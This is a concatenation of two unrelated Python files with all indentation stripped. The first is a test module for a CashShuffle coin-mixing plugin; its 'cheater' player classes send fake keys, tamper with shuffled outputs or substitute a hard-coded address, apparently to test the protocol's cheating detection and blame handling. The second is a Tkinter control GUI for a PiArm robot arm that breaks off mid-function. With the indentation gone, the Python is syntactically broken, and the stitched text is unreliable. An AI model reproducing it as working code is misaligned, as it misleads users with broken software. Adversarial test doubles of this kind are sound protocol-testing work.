def add_coin(self, address, value, height = 0, tx_pos = 0, tx_hash = ''):
if not self.coins.get(address):
self.coins[address] = []
self.coins[address].append({ "height" : height, "value": value , "tx_pos": tx_pos , "tx_hash" :tx_hash})
def synchronous_get(self, command):
bc_command, addresses = command
if bc_command == 'blockchain.scripthash.listunspent':
if len(addresses) > 0:
result = [self.coins[addr] for addr in self.coins if addr.to_scripthash_hex()==addresses[0]][0]
return result
else:
return []
def broadcast_transaction(self, tx):
return True, "done"
def is_connected(self):
return self.should_be_connected
class testThread(ProtocolThread):
def __init__(self, host, port, network, coin_name ,amount, fee, sk, sks, inputs, pubk, addr_new, change, logger = None, ssl = False):
# host, port, network, amount, fee, sk, sks, inputs, pubk, addr_new, change, logger=None, ssl=False
super(testThread, self).__init__(host, port, network, coin_name, amount, fee, sk, sks, inputs, pubk, addr_new, change, logger = logger, ssl = ssl)
@classmethod
def from_private_key(cls, priv_key, coin_hash, host, port, network, amount, fee, addr_new, change, ssl=False, logger = None):
address, secret, compressed = deserialize_privkey(priv_key)
sk = regenerate_key(secret)
pubk = sk.get_public_key(compressed)
sks = {pubk:sk}
inputs = {pubkey:[coin_hash]}
return cls(host, port, network, coin_hash ,amount, fee, sk, sks, inputs, pubk, addr_new, change, ssl=ssl, logger = logger)
# @classmethod
# def from_sk(cls, sk, sks, pubk, inputs, host, port, network, amount, fee, addr_new, change, compressed = True, logger = None):
# # pubk = sk.get_public_key(compressed)
# # sks = {pubk:sk}
# # inputs = {pubk:[coin_hash]}
# return cls(host, port, network, amount, fee,
# sk, sks, inputs, pubk, addr_new, change, logger=logger)
class random_sk(EC_KEY):
def __init__(self):
G = generator_secp256k1
_r = G.order()
pvk = ecdsa.util.randrange( _r )
eck = EC_KEY.__init__(self, number_to_string(pvk,_r))
def make_fake_public_key(compressed=True, secret_key = None):
sk = secret_key
if not secret_key:
sk = random_sk()
return sk.GetPubKey(compressed).hex()
def make_fake_address(compressed=True):
return public_key_to_p2pkh(make_fake_public_key(compressed=compressed))
def fake_hash(address, value):
return Hash("{}{}".format(address, value)).hex()
class Crypto_cheater(Crypto):
"""
This class is faking the Crypto. It needs for cheating on encryption decryption phase
"""
def generate_fake_key_pair(self):
self.fake_private_key = ecdsa.util.randrange( self._r )
self.fake_eck = EC_KEY(number_to_string(self.fake_private_key, self._r))
self.fake_public_key = point_to_ser(self.fake_private_key*self.G,True)
def export_fake_public_key(self):
return bytes.hex(self.fake_public_key)
def decrypt(self, message):
try:
return self.eck.decrypt_message(message)
except InvalidPassword:
return self.fake_eck.decrypt_message(message)
# return self.eck.decrypt_message(message)
class Round_wrong_broadcast(Round):
"""
This Class implements wrong behaviour of protocol
when cheater player send wrong encryption keys to one of
the player. All we do here is just redefine the broadcast key function
"""
def broadcast_new_key(self):
self.phase = 'Announcement'
self.crypto.generate_key_pair()
self.crypto.generate_fake_key_pair()
victim_key = random.choice([self.players[player] for player in self.players if not self.players[player] == self.vk])
print('PLAYER ' + str(self.me) + " IS A CHEATER")
print('CHEATER KEY IS ' + str(self.vk) )
victim_number = {self.players[player]:player for player in self.players}[victim_key]
print('VICTIM is ' + str(victim_number))
print('VICTIM KEY is ' + str(victim_key))
for player in self.players:
self.messages.clear_packets()
if self.players[player] is not victim_key:
self.messages.add_encryption_key(self.crypto.export_public_key(), self.change)
else:
self.messages.add_encryption_key(self.crypto.export_fake_public_key(), self.change)
self.send_message(destination = self.players[player])
# class for testing of sending of different vectors on pahse 3
class Round_wrong_output_vector(Round):
"""
This Class implements wrong behaviour of protocol
when cheater player send wrong output vector to one of
the player. All we do here is just redefine the process_shuffling function
"""
def process_shuffling(self):
phase = self.messages.phases[self.phase]
if self.me == self.last_player():
victim_key = random.choice([self.players[player] for player in self.players if not self.players[player] == self.vk])
victim_number = {self.players[player]:player for player in self.players}[victim_key]
self.logchan.send("The last player choose Player " + str(victim_number) + " as a VICTIM")
sender = self.players[self.previous_player(player = self.last_player())]
self.some_fake_address = '1574vWgV4DAhRBhzx7q2k1p1SeA2wCpiPF'
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add the last address
self.messages.add_str(self.addr_new)
# shuffle the packets
self.messages.shuffle_packets()
# form packet ...
self.phase = 'BroadcastOutput'
for player in self.players:
if not player == victim_number:
self.send_message(destination = self.players[player])
else:
# find it's own address and change em change some address in the vector
addresses = [packet.packet.message.str for packet in self.messages.packets.packet]
my_index = addresses.index(self.addr_new)
self.messages.packets.packet[my_index].packet.message.str = self.some_fake_address
self.send_message(destination = self.players[player])
self.messages.packets.packet[my_index].packet.message.str = self.addr_new
# self.send_message()
self.logchan.send("Player " + str(self.me) + " encrypt new address")
else:
sender = self.players[self.previous_player()]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add encrypted new addres of players
self.messages.add_str(self.encrypt_new_address())
# shuffle the packets
self.messages.shuffle_packets()
self.send_message(destination = self.players[self.next_player()])
self.logchan.send("Player " + str(self.me) + " encrypt new address")
self.phase = 'BroadcastOutput'
def process_broadcast_output(self):
phase = self.messages.phases[self.phase]
sender = self.players[self.last_player()]
if self.inbox[phase].get(sender):
# extract addresses from packets
self.messages.packets.ParseFromString(self.inbox[phase][sender])
self.new_addresses = self.messages.get_new_addresses()
#check if player address is in
if self.addr_new in self.new_addresses or self.some_fake_address in self.new_addresses:
self.logchan.send("Player "+ str(self.me) + " receive addresses and found itsefs")
else:
self.messages.clear_packets()
self.messages.blame_missing_output(self.vk)
self.send_message()
self.logchan.send("Blame: player " + str(self.me) + " not found itsefs new address")
raise BlameException("Blame: player " + str(self.me) + " not found itsefs new address")
self.phase = 'EquivocationCheck'
self.logchan.send("Player "+ str(self.me) + " reaches phase 4: ")
# compute hash
computed_hash =self.crypto.hash(str(self.new_addresses) + str([self.encryption_keys[self.players[i]] for i in sorted(self.players) ]))
# create a new message
self.messages.clear_packets()
# add new hash
self.messages.add_hash(computed_hash)
self.send_message()
class Round_wrong_ciphertexts(Round):
"""
This Class implements wrong behaviour of protocol
when cheater player add the same ciphertext in the shuffling phase
"""
def process_shuffling(self):
phase = self.messages.phases[self.phase]
if self.me == self.last_player():
sender = self.players[self.previous_player(player = self.last_player())]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add the last address
self.messages.add_str(self.addr_new)
# shuffle the packets
self.messages.shuffle_packets()
# form packet ...
self.phase = 'BroadcastOutput'
self.send_message()
self.logchan.send("Player " + str(self.me) + " encrypt new address")
else:
sender = self.players[self.previous_player()]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add encrypted new addres of players
if not self.different_ciphertexts():
encrypted_address = self.encrypt_new_address()
packet_index = random.randint(0, len(self.messages.get_new_addresses())-1)
self.logchan.send("CHEATER IS " + str(self.me))
self.messages.packets.packet[packet_index].packet.message.str = encrypted_address
self.messages.add_str(encrypted_address)
# shuffle the packets
self.messages.shuffle_packets()
self.send_message(destination = self.players[self.next_player()])
self.logchan.send("Player " + str(self.me) + " encrypt new address")
self.phase = 'BroadcastOutput'
else:
self.logchan.send('wrong ciphertext')
class Round_wrong_outputs(Round):
"""
This Class implements wrong behaviour of protocol
when cheater change the output for new value
"""
def process_shuffling(self):
phase = self.messages.phases[self.phase]
if self.me == self.last_player():
sender = self.players[self.previous_player(player = self.last_player())]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add the last address
self.messages.add_str(self.addr_new)
# shuffle the packets
self.messages.shuffle_packets()
# form packet ...
self.phase = 'BroadcastOutput'
self.send_message()
self.logchan.send("Player " + str(self.me) + " encrypt new address")
else:
sender = self.players[self.previous_player()]
if self.inbox[phase].get(sender):
self.messages.packets.ParseFromString(self.inbox[phase][sender])
for packet in self.messages.packets.packet:
packet.packet.message.str = self.crypto.decrypt(packet.packet.message.str)
# add encrypted new addres of players
if not self.different_ciphertexts():
encrypted_address = self.encrypt_new_address()
original_address = self.addr_new
self.addr_new = '1574vWgV4DAhRBhzx7q2k1p1SeA2wCpiPF'
encrypted_address_2 = self.encrypt_new_address()
self.addr_new = original_address
packet_index = random.randint(0, len(self.messages.get_new_addresses())-1)
self.logchan.send("CHEATER IS " + str(self.me))
self.messages.packets.packet[packet_index].packet.message.str = encrypted_address_2
self.messages.add_str(encrypted_address)
# shuffle the packets
self.messages.shuffle_packets()
self.send_message(destination = self.players[self.next_player()])
self.logchan.send("Player " + str(self.me) + " encrypt new address")
self.phase = 'BroadcastOutput'
else:
self.logchan.send('wrong ciphertext')
# Rewrite the client class with badass behaviour
class bad_client_wrong_broadcast(ProtocolThread):
# def __init__(self, host, port, network, amount, fee, sk, pubk, addr_new, change, logger = None, ssl = False):
# super(bad_client_wrong_broadcast, self).__init__(host, port, network, amount, fee, sk, pubk, addr_new, change, logger = logger, ssl = False)
def not_time_to_die(f):
def wrapper(self):
if not self.done.is_set():
f(self)
else:
pass
return wrapper
@not_time_to_die
def start_protocol(self):
coin = Coin(self.network)
crypto = Crypto_cheater()
self.messages.clear_packets()
# begin_phase = Phase('Announcement')
begin_phase = 'Announcement'
# Make Round
self.protocol = Round_wrong_broadcast(
coin, crypto, self.messages,
self.outcome, self.income, self.logger,
self.session, begin_phase, self.amount, self.fee,
self.sk, self.sks, self.all_inputs, self.vk,
self.players, self.addr_new, self.change
)
# self.execution_thread = threading.Thread(target = self.protocol.protocol_loop)
self.execution_thread = threading.Thread(target = self.protocol.start_protocol)
self.execution_thread.start()
self.done.wait()
self.execution_thread.join()
class bad_client_output_vector(ProtocolThread):
# def __init__(self, host, port, network, amount, fee, sk, pubk, addr_new, change, logger = None, ssl = False):
# super(bad_client_wrong_broadcast, self).__init__(host, port, network, amount, fee, sk, pubk, addr_new, change, logger = logger, ssl = False)
def not_time_to_die(f):
def wrapper(self):
if not self.done.is_set():
f(self)
else:
pass
return wrapper
@not_time_to_die
def start_protocol(self):
coin = Coin(self.network)
crypto = Crypto_cheater()
self.messages.clear_packets()
# begin_phase = Phase('Announcement')
begin_phase = 'Announcement'
# Make Round
self.protocol = Round_wrong_output_vector(
coin, crypto, self.messages,
self.outcome, self.income, self.logger,
self.session, begin_phase, self.amount, self.fee,
self.sk, self.sks, self.all_inputs, self.vk,
self.players, self.addr_new, self.change
)
# self.execution_thread = threading.Thread(target = self.protocol.protocol_loop)
self.execution_thread = threading.Thread(target = self.protocol.start_protocol)
self.execution_thread.start()
self.done.wait()
self.execution_thread.join()
class bad_client_same_ciphertext(ProtocolThread):
def not_time_to_die(f):
def wrapper(self):
if not self.done.is_set():
f(self)
else:
pass
return wrapper
@not_time_to_die
def start_protocol(self):
coin = Coin(self.network)
# crypto = Crypto_cheater()
crypto = Crypto()
self.messages.clear_packets()
# begin_phase = Phase('Announcement')
begin_phase = 'Announcement'
# Make Round
self.protocol = Round_wrong_ciphertexts(
coin, crypto, self.messages,
self.outcome, self.income, self.logger,
self.session, begin_phase, self.amount, self.fee,
self.sk, self.sks, self.all_inputs, self.vk,
self.players, self.addr_new, self.change
)
# self.execution_thread = threading.Thread(target = self.protocol.protocol_loop)
self.execution_thread = threading.Thread(target = self.protocol.start_protocol)
self.execution_thread.start()
self.done.wait()
self.execution_thread.join()
class bad_client_changig_the_output(ProtocolThread):
def not_time_to_die(f):
def wrapper(self):
if not self.done.is_set():
f(self)
else:
pass
return wrapper
@not_time_to_die
def start_protocol(self):
coin = Coin(self.network)
crypto = Crypto()
self.messages.clear_packets()
# begin_phase = Phase('Announcement')
begin_phase = 'Announcement'
# Make Round
self.protocol = Round_wrong_outputs(
coin, crypto, self.messages,
self.outcome, self.income, self.logger,
self.session, begin_phase, self.amount, self.fee,
self.sk, self.sks, self.all_inputs, self.vk,
self.players, self.addr_new, self.change
)
# self.execution_thread = threading.Thread(target = self.protocol.protocol_loop)
self.execution_thread = threading.Thread(target = self.protocol.start_protocol)
self.execution_thread.start()
self.done.wait()
self.execution_thread.join()
class TestProtocolCase(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestProtocolCase,self).__init__(*args, **kwargs)
config = configparser.ConfigParser()
config.read_file(open('plugins/shuffle/tests/config.ini'))
self.HOST = config["CashShuffle"]["address"]
self.PORT = int(config["CashShuffle"]["port"])
self.fee = int(config["Clients"]["fee"])
self.amount = int(config["Clients"]["amount"])
self.number_of_players = int(config["CashShuffle"]["pool_size"])
self.server_debug = " -d " if {"True":True, "False":False}.get(config["CashShuffle"]["enable_debug"], False) else " "
self.args = self.server_debug + " -s "+ str(self.number_of_players) + " -p " + str(self.PORT)
self.casshuffle_path = config["CashShuffle"]["path"]
def setUp(self):
self.network = testNetwork()
self.logger = ChannelWithPrint()
print("exec " + self.casshuffle_path + self.args)
self.server = subprocess.Popen("exec " + self.casshuffle_path + self.args, shell = True, preexec_fn=os.setsid)
def tearDown(self):
self.server.kill()
def get_random_address(self):
return public_key_to_p2pkh(bytes.fromhex(random_sk().get_public_key()))
def make_bad_client(self, bad_cleint_thread , with_print = False):
sk = random_sk()
channel = ChannelWithPrint() if with_print else Channel()
public_key = sk.get_public_key()
inputs = {}
number_of_pubs = random.randint(1,3)
secret_keys = [random_sk() for _ in range(number_of_pubs)]
sks = {sk.get_public_key():sk for sk in secret_keys}
for pubk in sks:
inputs[pubk]=[]
number_of_coins = random.randint(1,2)
addr = public_key_to_p2pkh(bytes.fromhex(pubk))
for i in range(number_of_coins):
min_amout_per_input = self.amount // number_of_pubs // number_of_coins
coin_amount = random.randint(min_amout_per_input + self.fee + 1 , min_amout_per_input + self.fee + 1000)
coin_hash = fake_hash(addr, coin_amount)
inputs[pubk].append(coin_hash+":0")
self.network.add_coin(addr, coin_amount, tx_hash=coin_hash)
return bad_cleint_thread(self.HOST, self.PORT, self.network,
self.amount, self.fee, sk, sks, inputs , public_key,
self.get_random_address(), self.get_random_address(), logger = channel)
def make_clients_threads(self, number_of_clients = None, with_print = False):
if not number_of_clients:
number_of_clients = self.number_of_players
players = [{"channel":ChannelWithPrint() if with_print else Channel()}
for _ in range(number_of_clients)]
for player in players:
number_of_pubs = random.randint(1,3)
player["secret_keys"] = [random_sk() for _ in range(number_of_pubs)]
player["sks"] = {sk.get_public_key():sk for sk in player["secret_keys"]}
player["inputs"] = {}
for pubk in player["sks"]:
player["inputs"][pubk]=[]
number_of_coins = random.randint(1,2)
addr = public_key_to_p2pkh(bytes.fromhex(pubk))
for i in range(number_of_coins):
min_amout_per_input = self.amount // number_of_pubs // number_of_coins
coin_amount = random.randint(min_amout_per_input + self.fee + 1 , min_amout_per_input + self.fee + 1000)
coin_hash = fake_hash(addr, coin_amount)
player["inputs"][pubk].append(coin_hash+":0")
# self.network.add_coin(addr, coin_amount, tx_hash=coin_hash)
self.network.add_coin(Address.from_pubkey(pubk), coin_amount, tx_hash=coin_hash)
player["sk"] = random_sk()
player["pubk"] = player["sk"].get_public_key()
protocolThreads = [testThread(self.HOST, self.PORT, self.network, "x" ,self.amount, self.fee,
player["sk"], player["sks"], player["inputs"], player["pubk"],
self.get_random_address(), self.get_random_address(), logger = player['channel'])
for player in players]
return protocolThreads
def start_protocols(self, protocolThreads, delay = 0):
for pThread in protocolThreads:
time.sleep(delay)
pThread.start()
def stop_protocols(self, protocolThreads):
for pThread in protocolThreads:
pThread.join()
def is_protocol_complete(self, pThread):
if pThread.protocol:
return pThread.protocol.done
else:
return False
def is_round_live(sefl, pThread):
return pThread.execution_thread.is_alive() if pThread.execution_thread else None
def get_last_logger_message(self, pThread, debug = False):
message = None
while not pThread.logger.empty():
message = pThread.logger.get()
if debug:
print(message)
return message
|
controlGUI.py
|
#! /usr/bin/python3
'''
This file contains GUI code for Controlling PiArm
'''
import piarm
import logging
import os
import threading
import shutil
import subprocess
import time
import re
import picamera
from tkinter import font
import tkinter as tk
from tkinter import messagebox
from tkinter import simpledialog
from tkinter import filedialog
########################## MainApp ###########################################
class MainApp(piarm.PiArm, tk.Tk):
'''
This is a class for Creating Frames and Buttons for left and top frame
'''
def __init__(self, *args, **kwargs):
global logo, img
tk.Tk.__init__(self, *args, **kwargs)
self.screen_width=tk.Tk.winfo_screenwidth(self)
self.screen_height=tk.Tk.winfo_screenheight(self)
self.app_width=800
self.app_height= 480
self.xpos = (self.screen_width/2)-(self.app_width/2)
self.ypos = (self.screen_height/2)-(self.app_height/2)
self.port = None
self.groupSelected = None
self.loopVar = tk.IntVar()
self.checkIDVar = []
self.posEntry = []
self.timeEntry = []
self.modify_data = []
self.servo_POS_error = False
self.geometry("%dx%d+%d+%d" %(self.app_width,self.app_height,self.xpos,
self.ypos))
self.title("PiArm Controller")
if not self.screen_width > self.app_width:
self.attributes('-fullscreen', True)
self.config(bg="gray85")
self.container = tk.Frame(self,height=480, width=800)
self.container.pack(fill = 'both', expand = True)
self.camFrame = tk.Frame(self,height=480, width=800, bg='black')
self.left_frame=tk.Frame(self.container,width=int(self.app_width/4),
bg="gray85")
self.left_frame.pack(side="left", fill="both")
self.left_frame.pack_propagate(0)
self.mid_frame=tk.Frame(self.container,width=5,bg="gray50")
self.mid_frame.pack(side="left", fill="both")
self.right_frame=tk.Frame(self.container,bg="gray85")
self.right_frame.pack(side="left",fill="both",expand=True)
logo = tk.PhotoImage(file = Root_Dir + '/Images/DALogoSmall.png')
img = tk.PhotoImage(file = Root_Dir + '/Images/piarm.png')
self.camIcon = tk.PhotoImage(file = Root_Dir + '/Images/camera.png')
self.vidIcon = tk.PhotoImage(file = Root_Dir + '/Images/video.png')
self.clickIcon = tk.PhotoImage(file = Root_Dir + '/Images/click.png')
self.homeIcon = tk.PhotoImage(file = Root_Dir + '/Images/home.png')
self.backIcon = tk.PhotoImage(file = Root_Dir + '/Images/back.png')
self.protocol("WM_DELETE_WINDOW", self.close_Robot)
self.leftFrame_Contents()
self.rightFrame_Contents()
def close_Robot(self):
'''
This function delete the temp folder and close PiArm
'''
try:
shutil.rmtree(Root_Dir + '/.Temp')
except FileNotFoundError:
pass
self.log.info('PiArm Closed Successfully..!!')
self.destroy()
def leftFrame_Contents(self):
'''
This function creates the left frame widgets
'''
serial_box=tk.Canvas(self.left_frame,width=160,
height=110)
serial_box.grid(row=0, column=0)
serial_box.grid_propagate(False)
''' Serial Canvas '''
for i in range (4):
serial_box.grid_rowconfigure(i,weight=1)
if i < 2:
serial_box.grid_columnconfigure(i,weight=1)
serial_heading=tk.Label(serial_box,bg="gray50",fg="white",
text="SERIAL")
serial_heading.grid(row=0, column=0,columnspan=2, sticky="new")
com_label = tk.Label(serial_box, fg="Black",text="Port")
com_label.grid(row=1, column=0)
self.com_entry = tk.Entry(serial_box,width=10)
self.com_entry.grid(row=1, column=1)
if self.port:
self.com_entry.insert(0, self.port)
baud_label = tk.Label(serial_box, fg="Black",text="Baudrate")
baud_label.grid(row=2, column=0)
baud_entry = tk.Entry(serial_box,width=10)
baud_entry.insert("end", "115200")
baud_entry.grid(row=2, column=1)
baud_entry.config(state="readonly")
self.circle=tk.Canvas(serial_box,height=40, width=40,bg="gray85",bd=0)
self.indication = self.circle.create_oval(10,10,30,30, fill="red")
self.circle.grid(row=3, column=0)
self.connect_button = tk.Button(serial_box,text="Open",bg="gray80", bd=2,
borderwidth=2,command = self.connectPort)
self.connect_button.grid(row=3, column=1)
''' Record Canvas '''
record_box=tk.Canvas(self.left_frame,width=160, height=120)
record_box.grid(row=1, column=0)
record_box.grid_propagate(False)
for i in range (4):
record_box.grid_rowconfigure(i,weight=1)
if i < 2:
record_box.grid_columnconfigure(i,weight=1)
record_heading=tk.Label(record_box,bg="gray50",fg="white",
text="RECORD")
record_heading.grid(row=0, column=0, columnspan=2, sticky="new")
readButton = tk.Button(record_box,text="Read",bg='gray80',borderwidth=2,
command=self.read_ServoPos, bd=2)
readButton.grid(row=0, column=0, pady=(22,0))
writeButton = tk.Button(record_box,text="Write",bg='gray80',borderwidth=2,
command = self.write_ServoPos, bd=2)
writeButton.grid(row=0, column=1, pady=(22,0))
defaultButton = tk.Button(record_box,text=" Default_Position ",bg='gray80',
borderwidth=2, command=self.default_Pos, bd=2)
defaultButton.grid(row=1, column=0,columnspan=2)
self.torqueButton = tk.Button(record_box,text="All_Torque_Enable",
bg='gray80',command=self.allTorque_Enable,
bd=2, borderwidth=2)
self.torqueButton.grid(row=2, column=0, columnspan=2)
''' Group Canvas '''
group_box=tk.Canvas(self.left_frame,width=160, height=90)
group_box.grid(row=2, column=0)
group_box.grid_propagate(False)
for i in range (4):
group_box.grid_rowconfigure(i,weight=1)
if i < 2:
group_box.grid_columnconfigure(i,weight=1)
group_Label=tk.Label(group_box,bg="gray50",fg="white",
text="GROUP")
group_Label.grid(row=0, column=0, columnspan=2, sticky="new")
addGroup_Button = tk.Button(group_box,text=" Add ",bg='gray80', bd=2,
command = self.add_Group, borderwidth=2)
addGroup_Button.grid(row=0, column=0, pady=(22,0))
delGroup_Button = tk.Button(group_box,text="Delete",bg='gray80',bd=2,
command=self.deleteGroup, borderwidth=2)
delGroup_Button.grid(row=0, column=1, pady=(22,0))
importButton = tk.Button(group_box,text="Import",bg='gray80', bd=2,
command=self.importGroup, borderwidth=2)
importButton.grid(row=1, column=0)
exportButton = tk.Button(group_box,text="Export",bg='gray80',bd=2,
command=self.exportGroup, borderwidth=2)
exportButton.grid(row=1, column=1)
''' Command Canvas '''
cmd_box=tk.Canvas(self.left_frame,width=160, height=140)
cmd_box.grid(row=3, column=0)
cmd_box.grid_propagate(False)
for i in range (4):
cmd_box.grid_rowconfigure(i,weight=1)
if i < 2:
cmd_box.grid_columnconfigure(i,weight=1)
record_heading=tk.Label(cmd_box,bg="gray50",fg="white",
text="COMMAND")
record_heading.grid(row=0, column=0, columnspan=2, sticky="new")
timeLabel=tk.Label(cmd_box, text="Time (ms)")
timeLabel.grid(row=0, column=0, pady=(22,0))
delay_vcmd = (self.register(self.delay_validate),'%P')
self.delayEntry = tk.Entry(cmd_box,validate='key',width=5, bd='1',
validatecommand=delay_vcmd)
self.delayEntry.grid(row=0, column=1, pady=(22,0))
self.delayEntry.insert('end', 1000)
addCmd_Button = tk.Button(cmd_box,text=" Add ",bg='gray80',borderwidth=2,
command=self.add_Command, bd=2)
addCmd_Button.grid(row=1, column=0)
delCmd_Button = tk.Button(cmd_box,text="Delete",bg='gray80',borderwidth=2,
command=self.del_Command, bd=2)
delCmd_Button.grid(row=1, column=1)
insertButton = tk.Button(cmd_box,text="Insert",bg='gray80', borderwidth=2,
command=self.insert_Command, bd=2 )
insertButton.grid(row=2, column=0)
modifyButton = tk.Button(cmd_box,text="Modify",bg='gray80', borderwidth=2,
command=self.modify_Command, bd=2)
modifyButton.grid(row=2, column=1)
loopButton = tk.Checkbutton(cmd_box, text='Loop',variable = self.loopVar,
onvalue=1, offvalue=0)
loopButton.grid(row=3, column=0)
self.playButton = tk.Button(cmd_box,text="Play",font=('Helvetica', 12),
command=self.cmdPlay,bg='SteelBlue2', bd=2,
borderwidth=2)
self.playButton.grid(row=3, column=1)
def connectPort(self):
'''
This function connects the serial port
'''
if self.connect_button.cget('text') == 'Open' and self.com_entry.get():
robot.connect("/dev/"+self.com_entry.get())
if robot.alive:
self.connect_button.config(relief="sunken", text="Close")
self.circle.itemconfigure(self.indication, fill="green3")
self.com_entry.config(state="readonly")
elif self.connect_button.cget('text') == 'Close':
self.connect_button.config(relief="raised", text="Open")
self.circle.itemconfigure(self.indication, fill="red")
robot.disconnect()
self.com_entry.config(state="normal")
else:
messagebox.showerror("Port Error", "Enter Comm Port..!!")
self.com_entry.config(state="normal")
def read_ServoPos(self):
'''
This funciton read servo position
'''
if robot.alive:
try:
for ID in range(1, 7):
response = robot.positionRead(ID)
pos = int.from_bytes(response[5]+response[6], byteorder='little')
if pos > MAX_VALUE:
self.servo_POS_error = True
break
else:
self.posEntry[ID-1].delete(0,'end')
self.posEntry[ID-1].insert(0, pos)
if self.servo_POS_error:
messagebox.showerror("Servo Error", "Servo " + str(ID) +
' - Position Out of Range..!')
self.servo_POS_error = False
else:
messagebox.showinfo("Data Read","Read Done Successfully")
except TypeError:
messagebox.showerror("Servo Error", "Servo " + str(ID) +
' - Not Responding')
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def write_ServoPos(self):
'''
This funciton write servo position
'''
try:
if robot.alive:
for ID in range(1, 7):
robot.servoWrite(ID,int(self.posEntry[ID-1].get()),
int(self.timeEntry[ID-1].get()))
self.checkIDVar[ID-1].set(1)
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
messagebox.showinfo("Data Write","Write Done Successfully")
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
except ValueError:
messagebox.showerror("Value Error", 'Entry value cannot be empty..!! !!')
def default_Pos(self):
'''
This funciton set each servo to default position
'''
if robot.alive:
DEFAULT = [500, 500, 500, 500, 500, 500]
for ID in range(1, 7):
robot.servoWrite(ID, int(DEFAULT[ID -1]), 500)
self.posEntry[ID-1].delete(0,'end')
self.posEntry[ID-1].insert(0, DEFAULT[ID-1])
self.checkIDVar[ID-1].set(1)
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
messagebox.showinfo("Default","Write Done Successfully")
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def allTorque_Enable(self):
'''
This function enable all servo torque
'''
if robot.alive:
if self.torqueButton.cget('text') == 'All_Torque_Enable':
self.torqueButton.config(relief="sunken", text="All_Torque_Disable")
for ID in range(1, 7):
robot.torqueServo(ID, 1)
self.checkIDVar[ID-1].set(1)
elif self.torqueButton.cget('text') == 'All_Torque_Disable':
self.torqueButton.config(relief="raised", text="All_Torque_Enable")
for ID in range(1, 7):
robot.torqueServo(ID, 0)
self.checkIDVar[ID-1].set(0)
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def tick_EnTorque(self, index):
'''
This funciton enable selected servo torque
'''
if robot.alive:
robot.torqueServo(index + 1, self.checkIDVar[index].get())
else:
messagebox.showerror("Comm Error", 'Comm Port is not Connected !!')
def add_Group(self):
'''
This funciton add a group name
'''
groupName = simpledialog.askstring('Group Name', 'Enter a name')
if groupName:
for entry in self.groupBox.get('0', 'end'):
if entry == groupName:
tk.messagebox.showerror('Name Error','Group Name Already Exits..!!')
return 0
self.groupBox.insert('end', groupName)
if len(self.groupBox.get('0', 'end')) == 1:
self.groupBox.select_set(0)
self.groupBox.activate(0)
self.groupSelected = groupName
with open(Root_Dir+"/.Temp/"+groupName + ".txt", "w") as file:
self.log.info(groupName + ' temperary file created')
def deleteGroup(self):
'''
This funciton deleter selected group name
'''
if self.groupBox.size():
index = self.groupBox.index('active')
self.groupBox.delete(index)
os.remove(Root_Dir +'/.Temp/'+self.groupSelected+'.txt')
self.commandBox.delete(0, 'end')
size = self.groupBox.size()
if size:
self.groupSelected = self.groupBox.get('0')
self.groupBox.select_set(0)
self.groupBox.activate(0)
file = open(Root_Dir+'/.Temp/'+ self.groupSelected +'.txt', 'r')
for line in file:
stripLine = line.strip()
self.commandBox.insert(0,stripLine)
if size == 0:
self.groupSelected = None
else:
tk.messagebox.showerror('Group Error','Group Name Not Selected..!!')
def add_Command(self):
'''
This funciton add servo read values (i.e. command) to selected group
'''
if self.groupSelected:
cmdList = []
for ID in range(0, 6):
cmd = ("ID:" + str(ID+1) +' P' + (self.posEntry[ID].get()) + ",T" + (self.timeEntry[ID].get())+' ')
cmdList.append(cmd)
if str(self.delayEntry.get()) == '':
cmdList.append('Time:' + '1000')
else:
cmdList.append('Time:' + str(self.delayEntry.get()))
self.commandBox.insert('end',''.join(cmdList))
with open(Root_Dir+'/.Temp/' + self.groupSelected +'.txt', 'a') as file:
file.write(''.join(cmdList)+'\n')
else:
tk.messagebox.showerror('Group Error','Group Name Not Selected..!!')
def del_Command(self):
'''
This funciton delete selected command
'''
item = self.commandBox.curselection()
if item and self.groupSelected:
self.commandBox.delete(item)
cmd_List = self.commandBox.get(0, 'end')
with open(Root_Dir +"/.Temp/"+self.groupSelected+'.txt', 'w') as file:
for value in cmd_List:
file.write(value + '\n')
else:
tk.messagebox.showerror('Command Error','Command Not Selected..!!')
def insert_Command(self):
'''
This funciton insert command above the selected command
'''
item = self.commandBox.curselection()
if item and self.groupSelected:
cmdList = []
for ID in range(0, 6):
cmd = ("ID:" + str(ID+1) +' P' + (self.posEntry[ID].get()) + ",T" + (self.timeEntry[ID].get())+' ')
cmdList.append(cmd)
if str(self.delayEntry.get()) == '':
cmdList.append('Time:' + '1000')
else:
cmdList.append('Time:' + str(self.delayEntry.get()))
position = self.commandBox.curselection()
self.commandBox.insert(position,''.join(cmdList))
cmd_List = self.commandBox.get(0, 'end')
with open(Root_Dir+"/.Temp/"+self.groupSelected+'.txt', 'w') as file:
for value in cmd_List:
file.write(value + '\n')
else:
tk.messagebox.showerror('Command Error','Command Not Selected..!!')
def modify_Command(self):
'''
This funciton modify the selected command
'''
item = self.commandBox.curselection()
if item and self.groupSelected:
self.top_Level = tk.Toplevel()
windowWidth = self.top_Level.winfo_reqwidth()
windowHeight = self.top_Level.winfo_reqheight()
# Gets both half the screen width/height and window width/height
positionRight = int(self.top_Level.winfo_screenwidth()/2 - windowWidth/2)
positionDown = int(self.top_Level.winfo_screenheight()/2- windowHeight/2)
# Positions the window in the center of the page.
